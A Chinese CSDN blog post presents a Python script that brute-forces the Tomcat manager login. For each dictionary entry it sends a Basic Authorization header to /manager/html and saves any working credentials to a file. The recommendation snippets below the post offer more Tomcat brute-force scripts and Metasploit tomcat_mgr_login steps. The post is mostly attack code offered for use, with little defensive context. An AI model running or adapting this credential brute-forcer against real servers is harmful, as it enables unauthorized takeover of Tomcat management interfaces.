Python实现tomcat密码破解

最新推荐文章于 2022-08-07 18:34:41 发布
最新推荐文章于 2022-08-07 18:34:41 发布
阅读量253 收藏
点赞数
文章标签: python tomcat url windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34652083/article/details/112967399
版权

1.原理就是对tomcat毫无限制的密码访问依然有所响应,根据返回字符串进行判断识别

代码如下:

import requests
import base64

def bp(ip,port):
    try:
        print(ip)
        bp1(ip,port)
        url = 'http://'+ip+':'+port+'/manager/html'
        with open("passwd.txt", "r") as f:
            while 1:
                # 取出字典中的用户名和密码
                passwd = f.readline()[:-1]
                # 如果为空,dick.txt文件的最后一行,退出运行
                if passwd == "":
                    break
                # 对用户名和密码进行base64加密
                Authorization = "Basic " + base64.b64encode(passwd.encode("utf-8")).decode("utf-8")
                headers = {
                    "Authorization": Authorization
                }
                response = requests.get(url, headers=headers)
                #print(response.status_code)
                # 根据返回的状态码,判断用户名和密码是否正确
                if response.status_code == 200 and 'Tomcat' in response.text:
                    #print("success")
                    print(url+'|' + passwd)
                    save=open('r.txt','a+')
                    save.write(url+'-' + passwd+"\n")
                    save.close()
                    break
    except:
        pass

if __name__ == '__main__':
    bp('xxxxxxx','8081')

2.成功后会有r.txt输出

1want0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
python编写自动启动tomcat脚本
三成的博客
08-02 368
#!/usr/bin/python import subprocess import datetime res = subprocess.Popen("ps -ef |egrep -v grep | grep deployer",stdout=subprocess.PIPE,shell=True) tomcats=res.stdout.readlines() counts=len(tomcats) if counts>1: dt=datetime.datetime.now(
tomcat_连接池数据库密码加密解密方法
12-13
详细讲解tomcat 连接池数据库解密加密方法以及过程。
python3 threading实现多线程【简明易懂】
qq_40670457的博客
03-07 316
import threading,time def test(): for x in range(5): print(x) time.sleep(1) t=threading.Thread(target=test) t.daemon=True t.start() time.sleep(10) 以上案例运行效果如下: target指定test函数,...
python 暴力破解密码脚本
weixin_34204722的博客
09-24 2268
python 暴力破解密码脚本 以下,仅为个人测试代码,环境也是测试环境,暴力破解原理都是一样的, 假设要暴力破解登陆网站www.a.com 用户 testUser的密码, 首先,该网站登陆的验证要支持 无限次的密码尝试 假设testUser 的密码为 6位的纯数字   1:先长成 6位纯数字密码字典 import os pds=[] rg=range(0,10)...
测试python功能的web项目
05-24
【标题】:“测试python功能的...而Apache Tomcat的出现意味着这个项目可能采用了Java Web服务器来承载Python应用,实现了不同技术栈之间的融合。这个项目对于学习和理解Python在Web场景下的应用具有很高的参考价值。
基于python+springboot实现的针对Windows Server 2008 R2的基线安全检测系统.zip
最新发布
09-09
该项目是基于Python和Spring Boot技术实现的一个针对Windows Server 2008 R2操作系统的基线安全检测系统。这样的系统对于保障服务器的安全性至关重要,因为它能够定期检查并确保服务器配置符合安全最佳实践,防止...
简单的连接MySQL与Python的Bottle框架的方法
09-10
Python web开发中,Bottle框架是一个轻量级的、易于使用的微型Web框架,它允许开发者用少量的代码实现复杂的Web应用。而将Bottle与MySQL数据库连接起来,可以实现数据的存储和检索,这对于构建动态网站至关重要。...
Jenkins2.107+svn+tomcat8.0+jdk1.8安装+ansible部署web到两台tomcat
07-23
它支持各种语言,包括 Java、Python、 Ruby、C++等,同时也支持多种版本控制系统,包括SVN、Git、Mercurial等。Jenkins 的安装部署需要依赖 Java 环境和 Tomcat 容器。 首先,需要安装 JDK 和 Tomcat。JDK 是 Java ...
tomcat指定项目使用简单密码访问
吾日三省
01-05 231
vim apache-tomcat-8.5.56/webapps/XXXXXX(对应项目)/WEB-INF/web.xml <?xml version="1.0" encoding="UTF-8"?> app index.html index.htm index.jsp default.html default.htm default.jsp forc
tomcat也终于出现漏洞了
懿的博客
07-20 978
、 1.Tomcat漏洞介绍 使用 Apache Tomcat 软件了 Java Servlet,JavaServer 页,Java 表达式语言和 Java 的 WebSocket 技术的一个开源实现。Java Servlet,JavaServer Pages,Java Expression Language和Java WebSocket规范是在Java Community Process下开发的 。 阿粉相信大家现在用什么版本的多有,从7.0到目前最新的10.0的用什么版本的都有,但是现在,Tomcat
记一次暴力破解tomcat后台密码(附带python脚本)
Alone hackers的博客
08-07 5717
记一次暴力破解tomcat后台密码(附带python脚本)
使用python3对tomcat后台爆破
qq_35492650的博客
10-28 965
通过分析 import requests import base64 url = "http://127.0.0.1:8080/manager/html" with open("dict.txt", "r") as f: while 1: passwd = f.readline()[:-1] if passwd == "": bre...
tomcat后台密码爆破脚本(python+字典)_Web中间件漏洞之Tomcat
weixin_39806288的博客
11-21 964
1Tomcat简介Tomcat 服务器是一个免费的开放源代码的 Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试 JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好 Apache 服务器,可利用它响应 HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上 Tomcat 是 Apache 服务器的扩展,但运...
web渗透--tomcat管理密码破解
朝阳似锦 晖映山河
09-13 758
tomcat介绍 tomcat服务器是一个免费的开放源码的web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合普遍使用,是开发和调试JSP程序的首选。 默认8180端口是tomcat管理的HTTP端口 探测目标tomcat nmap -sV 目标IP地址 -p 8180 探测tomcat的版本信息 msf破解tomcat密码 msfconsole use auxiliary/scanner/http/tomcat_mgr_login set rhost、 rport r
破解tomcat管理员密码
java开发指南博客 【转载】
07-24 417
很多时候我们启动了tomcat进入了tomcat管理页面,我们可以点击tomcat manager查看我们部署好的项目,这时就会出现问题了,密码忘记了或者说想破解密码。狠命的输密码是不可取的,遇到这种问题可以这么来解决,这个方法非常好使。 1.打开tomcat的conf目录,找到tomcat-users.xml 2.打开这个文件。找到下面的几句 &lt;tomcat-users&gt; &l...
Tomcat口令猜解工具【Python脚本】
11-10 520
Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令。 测试环境:Tomcat版本 7.0 登录界面采用basic认证,Base 64加密一下,模拟浏览器进行发包 据测试,每个用户名输入5次错误的密码会锁定用户,想了一些办法,还是没能绕过,这里做个记录,有时间再完善。 目前只能用于简单的弱口令测试 Python脚本如下: ...
Apache Tomcat之后台暴力破解
千寻的博客
09-24 1558
文章目录第一步 发现后台地址第二步 抓取登录数据包,发现是第三步 设置burpsuit的Intrude模块第四步 分析返回的数据包免责声明 第一步 发现后台地址 第二步 抓取登录数据包,发现是 发现格式为:格式:用户名:密码 => tomcat:tomcat=> dG9tY2F0OnRvbWNhdA== base64加密 第三步 设置burpsuit的Intrude模块 设置三个迭代payload分别代表:用户名、:、密码、 接下来再将url编码去掉,因为在base64密文里=会被编码成%
python jboss
08-13
你可以将Python的Web框架(如Django、Flask等)与JBoss的Servlet容器(如Tomcat)结合使用,以在JBoss中运行Python Web应用程序。 总结来说,Python和JBoss可以通过多种方式结合使用,无论是通过管理API管理JBoss...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值